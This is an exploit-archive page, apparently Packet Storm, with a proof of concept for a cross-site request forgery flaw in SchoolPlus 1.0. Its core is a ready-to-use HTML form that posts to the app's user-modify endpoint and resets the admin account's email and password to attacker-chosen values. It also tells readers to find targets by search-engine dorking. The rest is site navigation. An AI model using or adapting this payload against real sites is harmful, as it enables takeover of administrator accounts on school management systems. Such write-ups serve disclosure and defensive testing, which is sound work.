SchoolPlus 1.0 Cross Site Request Forgery

SchoolPlus 1.0 Cross Site Request Forgery: Posted Sep 19, 2024; Authored by indoushka; SchoolPlus version 1.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | fb557b7299f9628d66d430ee6f48850fd20d9ba2f8b3d4dd0b284c112e09bdab; Download | Favorite | View

SchoolPlus 1.0 Cross Site Request Forgery

=============================================================================================================================================
| # Title     : SchoolPlus v1.0 CSRF Vulnerability                                                                                          |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |
| # Vendor    : http://webpay.com.np/#Product                                                                                               |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>
<body>
  <div class="container">
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">
      <div hidden="true">
        <input type="text" name="id" id="id" value="1">
      </div>
       <div>
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">
       </div>
       <div>
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">
       </div>
       <tr>
       <div>
        <label for='status'>Status</label>
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>
        
       </div>   
       <div style='height:80'>
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>
       </div>
    </form>
  </div>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Top Authors In Last 30 Days

Red Hat 240 files
Ubuntu 63 files
Debian 21 files
LiquidWorm 14 files
Apple 9 files
Gentoo 8 files
Alter Prime 3 files
EQSTLab 2 files
Yehia Elghaly 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,168)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,979)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,006)
UNIX (9,479)
UnixWare (188)
Windows (6,785)
Other

SchoolPlus 1.0 Cross Site Request Forgery

SchoolPlus 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SchoolPlus 1.0 Cross Site Request Forgery

Share This

SchoolPlus 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems